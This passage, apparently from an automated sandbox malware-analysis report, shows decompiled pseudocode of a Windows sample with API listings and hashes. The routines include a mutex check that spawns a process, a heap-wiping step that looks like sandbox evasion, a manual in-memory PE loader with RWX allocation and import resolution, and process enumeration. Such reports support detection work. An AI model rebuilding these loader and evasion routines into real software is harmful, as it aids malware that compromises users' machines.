							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t51 == 0) {
								goto L5;
							} else {
								WaitForSingleObject(_t81, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t81);
								CloseHandle(_t75);
								return 1;
							}
						} else {
							SetEvent(_t81);
							CloseHandle(_t81);
							CloseHandle(_t75);
							E00989C50(0x981000);
							return 1;
						}
					} else {
						CloseHandle(_t81);
						goto L5;
					}
				}
			}

0x00981599
0x0098159d
0x009815a5
0x009815a6
0x009815a9
0x009815c9
0x009815cf
0x009815d5
0x009815d9
0x009815df
0x009815ef
0x009815f4
0x00981602
0x00981615
0x0098162e
0x00981633
0x00981641
0x00981654
0x0098166d
0x00981671
0x00981691
0x00981698
0x00981673
0x0098167e
0x00981684
0x00981688
0x009816a4
0x009816d3
0x009816dc
0x009816e6
0x00981707
0x0098170f
0x00000000
0x00981711
0x00981714
0x0098171d
0x00981726
0x0098172d
0x00981734
0x00981744
0x00981744
0x009816a6
0x009816a7
0x009816ae
0x009816b5
0x009816bb
0x009816ca
0x009816ca
0x0098168a
0x0098168b
0x00000000
0x0098168b
0x00981688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 009815C9

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

_snwprintf.NTDLL ref: 00981602
GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098160E
HeapFree.KERNEL32(00000000), ref: 00981615
_snwprintf.NTDLL ref: 00981641
GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098164D
HeapFree.KERNEL32(00000000), ref: 00981654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00981667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0098167E
CloseHandle.KERNEL32(00000000), ref: 0098168B
GetLastError.KERNEL32 ref: 00981699
SetEvent.KERNEL32(00000000), ref: 009816A7
CloseHandle.KERNEL32(00000000), ref: 009816AE
CloseHandle.KERNEL32(00000000), ref: 009816B5

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
String ID:
API String ID: 4183562332-0
Opcode ID: ccf5af8c06d4ff05132d182c6774dded1fb41e52b4d4df33888b21ddcf961207
Instruction ID: 6df078aa79ef48fd3aec2332fc887dbfaebc501999f8cd62169f2a408c6c06c3
Opcode Fuzzy Hash: ccf5af8c06d4ff05132d182c6774dded1fb41e52b4d4df33888b21ddcf961207
Instruction Fuzzy Hash: 6E21D871658104BBEB20ABA0DC4EFDA3B7DEB80712F044091FA08E7391D6309A458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00981575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00981575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v4;
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v216;
				short _v344;
				short _v864;
				void* _v880;
				signed char _t34;
				void* _t51;
				int _t58;
				signed char _t71;
				signed char _t73;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t84;
				signed char _t87;
				void* _t89;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t105;
				void* _t127;

				L0:
				while(1) {
					_t84 = __edx;
					_t79 = __ecx;
					_t78 = __ebx;
					_t127 = __fp0 -  *[fs:edx];
					_t34 = __eax + 0x527dd026 | 0x0000004a;
					asm("fistp qword [ecx+ebx]");
					if(__ecx >= _t34) {
						break;
					}
					L14:
					_t127 = _t127 -  *[fs:edx];
					_t71 = _t73 | 0x0000004a;
					asm("retf");
					_t79 = _t82 - _t105;
					asm("daa");
					_push(__ebx);
					if (_t79 < 0) goto L5;
					L15:
					_t87 = _t71;
				}
				L19:
				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
				 *_t34 =  *_t34 + _t34;
				E00981830(0x981004, _t84, 0x4dbac13f,  &_v4);
				_t95 = _v4;
				 *0x98c200( &_v344, 0x40, _t95, _t89);
				HeapFree(GetProcessHeap(), 0, _t95);
				E00981830(0x981000, 4, 0x4dbac13f,  &_v4);
				_t96 = _v4;
				 *0x98c200( &_v216, 0x40, _t96, _t89);
				HeapFree(GetProcessHeap(), 0, _t96);
				_t97 = CreateEventW(0, 1, 0,  &_v344);
				if(_t97 == 0) {
					L22:
					return 0;
				} else {
					_t51 = CreateMutexW(0, 1,  &_v216); // executed
					_t91 = _t51;
					if(_t91 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v88, 0, 0x44);
							_v88.cb = 0x44;
							_v88.dwFlags = 0x80;
							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
							if(_t58 == 0) {
								goto L22;
							} else {
								WaitForSingleObject(_t97, 0xffffffff);
								CloseHandle(_v20);
								CloseHandle(_v20.hThread);
								CloseHandle(_t97);
								CloseHandle(_t91);
								return 1;
							}
						} else {
							SetEvent(_t97);
							CloseHandle(_t97);
							CloseHandle(_t91);
							E00989C50(0x981000);
							return 1;
						}
					} else {
						CloseHandle(_t97);
						goto L22;
					}
				}
			}

0x00981575
0x00981575
0x00981575
0x00981575
0x00981575
0x0098157b
0x0098157e
0x00981580
0x00981585
0x00000000
0x00000000
0x00981587
0x00981587
0x0098158a
0x0098158c
0x0098158f
0x00981591
0x00981592
0x00981593
0x00981594
0x00981594
0x00981594
0x009815d9
0x009815d9
0x009815df
0x009815ef
0x009815f4
0x00981602
0x00981615
0x0098162e
0x00981633
0x00981641
0x00981654
0x0098166d
0x00981671
0x00981691
0x00981698
0x00981673
0x0098167e
0x00981684
0x00981688
0x009816a4
0x009816d3
0x009816dc
0x009816e6
0x00981707
0x0098170f
0x00000000
0x00981711
0x00981714
0x0098171d
0x00981726
0x0098172d
0x00981734
0x00981744
0x00981744
0x009816a6
0x009816a7
0x009816ae
0x009816b5
0x009816bb
0x009816ca
0x009816ca
0x0098168a
0x0098168b
0x00000000
0x0098168b
0x00981688

APIs

_snwprintf.NTDLL ref: 00981602
GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098160E
HeapFree.KERNEL32(00000000), ref: 00981615
_snwprintf.NTDLL ref: 00981641
GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098164D
HeapFree.KERNEL32(00000000), ref: 00981654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00981667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0098167E
CloseHandle.KERNEL32(00000000), ref: 0098168B

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
String ID:
API String ID: 2595929981-0
Opcode ID: 3fba0684f3afbc4a539703036c58dc8d0a5c6f8edf4f649d0fcf20f50d5ea101
Instruction ID: d13a9d8f4ffa1db231e12c89bb8fb3ef1f1ff068c0ff01aa8a7fd5be2740342b
Opcode Fuzzy Hash: 3fba0684f3afbc4a539703036c58dc8d0a5c6f8edf4f649d0fcf20f50d5ea101
Instruction Fuzzy Hash: EA21EBB1518155BFEB20ABA19C4DFDA377CEF81711F040091FA08EB381DA3089469771

Uniqueness

Uniqueness Score: -1.00%

Function 00989EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t6;
				void* _t11;
				void* _t18;

				E00981B10(E00981BE0(0xd22e2014), 0x9811f0, 9, 0x3966646c, 0x98c1f0);
				E00981B10(E00981BE0(0x8f7ee672), 0x9810d0, 0x48, 0x6677a1d2, 0x98c0d0);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t18 = _t6;
				if(_t18 != 0) {
					memset(_t18, 0, 0x8000000);
					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
					E009815B0(_t11); // executed
				}
				ExitProcess(0);
			}

0x00989efe
0x00989f23
0x00989f39
0x00989f3f
0x00989f43
0x00989f4d
0x00989f60
0x00989f66
0x00989f66
0x00989f6d

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 00989F32
RtlAllocateHeap.NTDLL(00000000), ref: 00989F39
memset.NTDLL ref: 00989F4D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00989F59
RtlFreeHeap.NTDLL(00000000), ref: 00989F60

Part of subcall function 009815B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 009815C9
Part of subcall function 009815B0: _snwprintf.NTDLL ref: 00981602
Part of subcall function 009815B0: GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098160E
Part of subcall function 009815B0: HeapFree.KERNEL32(00000000), ref: 00981615
Part of subcall function 009815B0: _snwprintf.NTDLL ref: 00981641
Part of subcall function 009815B0: GetProcessHeap.KERNEL32(00000000,00989F6B), ref: 0098164D
Part of subcall function 009815B0: HeapFree.KERNEL32(00000000), ref: 00981654
Part of subcall function 009815B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00981667
Part of subcall function 009815B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0098167E
Part of subcall function 009815B0: CloseHandle.KERNEL32(00000000), ref: 0098168B

ExitProcess.KERNEL32 ref: 00989F6D

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
String ID:
API String ID: 871367918-0
Opcode ID: 528d42e38f87320ae3f0cd0bf96fda944b42795e68176624d047087edca409d3
Instruction ID: 1707717eda12b3a61219fc13ad2357f80e53bf227ab73170e00a54b10a6c58fb
Opcode Fuzzy Hash: 528d42e38f87320ae3f0cd0bf96fda944b42795e68176624d047087edca409d3
Instruction Fuzzy Hash: 1DF090B1B9C3007BF96437B46C2FF0F39195B80B86F104420B60AAA7DBEDB1980157B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00981F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00981F40(void* __ecx, void* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _t55;
				struct HINSTANCE__* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t65;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				intOrPtr* _t70;
				signed int _t71;
				void* _t79;
				intOrPtr _t81;
				struct HINSTANCE__* _t82;
				void* _t85;
				intOrPtr _t86;
				signed short* _t89;
				void* _t90;
				intOrPtr* _t91;
				_Unknown_base(*)()** _t93;
				void* _t96;
				intOrPtr* _t99;
				void* _t102;
				intOrPtr* _t104;
				signed short* _t106;
				void* _t108;
				void* _t109;
				signed short _t128;

				_t79 = 0;
				_t90 = __ecx;
				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
					L33:
					return _t79;
				} else {
					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					_v8 = _t99;
					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
						L32:
						goto L33;
					} else {
						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
						if(_t79 != 0) {
							memcpy(_t79, _t90,  *(_t99 + 0x54));
							_t109 = _t108 + 0xc;
							_t81 = _v8;
							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
							_v12 = _t55;
							if(_t102 < _t55) {
								do {
									_t86 =  *((intOrPtr*)(_t102 + 0x10));
									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
									_t102 = _t102 + 0x28;
									_t109 = _t109 + 0xc;
								} while (_t102 < _v12);
								_t81 = _v8;
							}
							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
							_v20 = _t59;
							if(_t104 < _t59) {
								do {
									_t70 = _t104 + 4;
									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
									_v16 = _t70;
									_t89 = _t104 + 8;
									if(_t89 < _t96) {
										do {
											_t71 =  *_t89 & 0x0000ffff;
											_t85 = (_t71 & 0x00000fff) +  *_t104;
											if((_t71 & 0x0000f000) == 0x3000) {
												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
											}
											_t89 =  &(_t89[1]);
										} while (_t89 < _t96);
										_t70 = _v16;
									}
									_t104 = _t104 +  *_t70;
								} while (_t104 < _v20);
								_t81 = _v8;
							}
							_t60 =  *((intOrPtr*)(_t81 + 0x80));
							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
								_t91 = _t60 + _t79;
								_t61 =  *((intOrPtr*)(_t91 + 0xc));
								_v8 = _t91;
								if(_t61 != 0) {
									while(1) {
										_t82 = LoadLibraryA(_t61 + _t79);
										_v20 = _t82;
										if(_t82 == 0) {
											break;
										}
										_t106 =  *_t91 + _t79;
										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
										_t65 =  *_t106;
										_t128 = _t65;
										if(_t128 == 0) {
											L29:
											_t91 = _v8 + 0x14;
											_v8 = _t91;
											_t61 =  *((intOrPtr*)(_t91 + 0xc));
											if(_t61 != 0) {
												continue;
											} else {
												return _t79;
											}
										} else {
											L24:
											L24:
											if(_t128 >= 0) {
												_t68 = _t65 + 2 + _t79;
											} else {
												_t68 = _t65 & 0x0000ffff;
											}
											_t69 = GetProcAddress(_t82, _t68);
											if(_t69 == 0) {
												break;
											}
											_t82 = _v20;
											_t106 =  &(_t106[2]);
											 *_t93 = _t69;
											_t93 = _t93 + 4;
											_t65 =  *_t106;
											if(_t65 != 0) {
												goto L24;
											} else {
												goto L29;
											}
										}
										goto L34;
									}
									VirtualFree(_t79, 0, 0x8000);
									_t79 = 0;
								}
							}
						}
						goto L32;
					}
				}
				L34:
			}

0x00981f47
0x00981f4a
0x00981f4f
0x00982105
0x0098210b
0x00981f63
0x00981f67
0x00981f69
0x00981f72
0x00982103
0x00000000
0x00981f87
0x00981f98
0x00981f9c
0x00981fa7
0x00981fb1
0x00981fb4
0x00981fba
0x00981fc3
0x00981fc6
0x00981fcb
0x00981fd0
0x00981fd0
0x00981fd9
0x00981fe7
0x00981fed
0x00981ff0
0x00981ff3
0x00981ff8
0x00981ff8
0x00982006
0x00982008
0x00982011
0x00982013
0x00982018
0x00982020
0x00982023
0x00982026
0x00982028
0x0098202b
0x00982030
0x00982032
0x00982032
0x00982042
0x00982049
0x0098204e
0x0098204e
0x00982051
0x00982054
0x00982058
0x00982058
0x0098205b
0x0098205d
0x00982062
0x00982062
0x00982065
0x0098206d
0x00982080
0x00982083
0x00982086
0x0098208b
0x00982090
0x00982099
0x0098209b
0x009820a0
0x00000000
0x00000000
0x009820a7
0x009820a9
0x009820ab
0x009820ad
0x009820af
0x009820da
0x009820dd
0x009820e0
0x009820e3
0x009820e8
0x00000000
0x009820ea
0x009820f2
0x009820f2
0x009820b1
0x00000000
0x009820b1
0x009820b1
0x009820bb
0x009820b3
0x009820b3
0x009820b3
0x009820bf
0x009820c7
0x00000000
0x00000000
0x009820c9
0x009820cc
0x009820cf
0x009820d1
0x009820d4
0x009820d8
0x00000000
0x00000000
0x00000000
0x00000000
0x009820d8
0x00000000
0x009820af
0x009820fb
0x00982101
0x00982101
0x0098208b
0x0098206d
0x00000000
0x00981f9c
0x00981f72
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,00988A23,?,000DBBA0), ref: 00981F92
memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,00988F82), ref: 00981FA7
memcpy.NTDLL(?,?,?), ref: 00981FE7
LoadLibraryA.KERNEL32(00988F82), ref: 00982093
GetProcAddress.KERNEL32(00000000,-00000002), ref: 009820BF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 009820FB

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
String ID:
API String ID: 4175162697-0
Opcode ID: f592345de63367f65b8617d784111fe2bf63045e4d1d0e72e1a464e9c1fd5e44
Instruction ID: 33e1faaa960f703e1dea6799855f955a257b44becd72966e332f4243e5d35af4
Opcode Fuzzy Hash: f592345de63367f65b8617d784111fe2bf63045e4d1d0e72e1a464e9c1fd5e44
Instruction Fuzzy Hash: F2518B72A042169FCB20DF59C884B69B3F9FF44318B284469E846E7341E771ED55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00982110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00982110(intOrPtr* __edx) {
				void* _v560;
				void* _t5;
				struct tagPROCESSENTRY32W* _t6;
				intOrPtr* _t13;
				void* _t14;

				_t13 = __edx;
				_t5 = CreateToolhelp32Snapshot(2, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 =  &_v560;
					_v560 = 0x22c;
					Process32FirstW(_t14, _t6);
					if(_t6 == 0) {
						L5:
						return CloseHandle(_t14);
					}
					do {
					} while (E00988B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
					goto L5;
				}
				return _t5;
			}

0x0098211f
0x00982121
0x00982127
0x0098212c
0x0098212e
0x00982134
0x00982140
0x00982148
0x00982173
0x00000000
0x00982174
0x00982150
0x0098215d
0x00000000
0x00982150
0x0098217f

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00982121
Process32FirstW.KERNEL32(00000000,?), ref: 00982140
CloseHandle.KERNEL32(00000000,?,?), ref: 00982174

Part of subcall function 00988B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,0098215D,0000022C,00000000,?,?), ref: 00988B47
Part of subcall function 00988B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0098215D,0000022C,00000000,?,?), ref: 00988B75
Part of subcall function 00988B30: RtlAllocateHeap.NTDLL(00000000,?,0098215D), ref: 00988B7C
Part of subcall function 00988B30: lstrcpyW.KERNEL32(00000004,?), ref: 00988B8F

Process32NextW.KERNEL32(00000000,0000022C), ref: 00982169

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 3893281644-0
Opcode ID: 6997857e50f4aeda9c9ffd3ae4eb1a734785ee8940b6fa383d421f8a2017138a
Instruction ID: 4ba0690f99cd1041071a16cd2deab34b20f5f2c9649cb48c563854f71f038993
Opcode Fuzzy Hash: 6997857e50f4aeda9c9ffd3ae4eb1a734785ee8940b6fa383d421f8a2017138a
Instruction Fuzzy Hash: FCF062755091146AD720BBB5BC4CFAF77ACEB89750F2441A5EE05D2281E73099058BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00986E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00986E70(intOrPtr* __ecx, intOrPtr __edx) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t274;
				signed char _t282;
				int _t285;
				intOrPtr _t286;
				intOrPtr _t294;
				signed int _t304;
				signed char _t308;
				signed char _t311;
				signed char _t320;
				signed char _t331;
				signed char _t334;
				signed char _t340;
				signed char _t352;
				signed char _t355;
				signed int _t364;
				void* _t366;
				int _t367;
				signed char _t370;
				intOrPtr _t371;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				char* _t379;
				signed char _t380;
				char* _t381;
				char* _t382;
				signed char _t385;
				signed char _t386;
				signed char _t387;
				char* _t388;
				char* _t389;
				char* _t390;
				char* _t391;
				char* _t396;
				signed char _t397;
				signed char _t398;
				char* _t399;
				char* _t400;
				intOrPtr _t401;
				intOrPtr _t402;
				signed int _t403;
				void* _t404;
				void* _t405;
				signed int _t406;
				void* _t407;
				int _t408;
				intOrPtr _t409;
				int _t412;
				signed int _t413;
				void* _t414;
				intOrPtr* _t415;
				void* _t416;

				_t402 = __edx;
				_t415 = __ecx;
				_v24 = __edx;
				_v12 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0) {
					L2:
					_v8 = 0;
				} else {
					_v8 = 1;
					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
						goto L2;
					}
				}
				if( *_t415 != 0) {
					L6:
					_t274 = _t415 + 0x39272;
				} else {
					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
						goto L6;
					} else {
						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
					}
				}
				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
				_v20 = _t274;
				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
				 *(_t415 + 0x58) = 0;
				 *(_t415 + 0x5c) = 0;
				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
					_t397 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
					_t352 = _t397 + 8;
					 *(_t415 + 0x44) = _t352;
					if(_t352 >= 8) {
						do {
							_t400 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t400 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
					_t398 =  *(_t415 + 0x44);
					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
					_t49 = _t398 + 8; // 0x10
					_t355 = _t49;
					 *(_t415 + 0x44) = _t355;
					if(_t355 >= 8) {
						do {
							_t399 =  *((intOrPtr*)(_t415 + 0x30));
							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
								 *_t399 =  *(_t415 + 0x48);
								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
							}
							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
						} while ( *(_t415 + 0x44) >= 8);
					}
				}
				_t370 =  *(_t415 + 0x44);
				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
				_t66 = _t370 + 1; // 0x9
				_t282 = _t66;
				 *(_t415 + 0x44) = _t282;
				if(_t282 >= 8) {
					do {
						_t396 =  *((intOrPtr*)(_t415 + 0x30));
						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
							 *_t396 =  *(_t415 + 0x48);
							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
						}
						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
					} while ( *(_t415 + 0x44) >= 8);
				}
				_t403 =  *(_t415 + 0x48);
				_t409 =  *((intOrPtr*)(_t415 + 0x30));
				_t364 =  *(_t415 + 0x44);
				_v16 = _t403;
				if(_v8 != 0) {
					L31:
					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
						_t285 = _v12;
						goto L58;
					} else {
						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
						 *(_t415 + 0x48) = 0 << _t364 | _t403;
						_t331 = _t364 + 2;
						 *(_t415 + 0x44) = _t331;
						if(_t331 >= 8) {
							do {
								_t391 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t391 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t385 =  *(_t415 + 0x44);
						if(_t385 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
							do {
								_t390 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t390 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t407 = 2;
						do {
							_t386 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
							_t126 = _t386 + 0x10; // 0x18
							_t334 = _t126;
							 *(_t415 + 0x44) = _t334;
							if(_t334 >= 8) {
								do {
									_t389 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t389 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
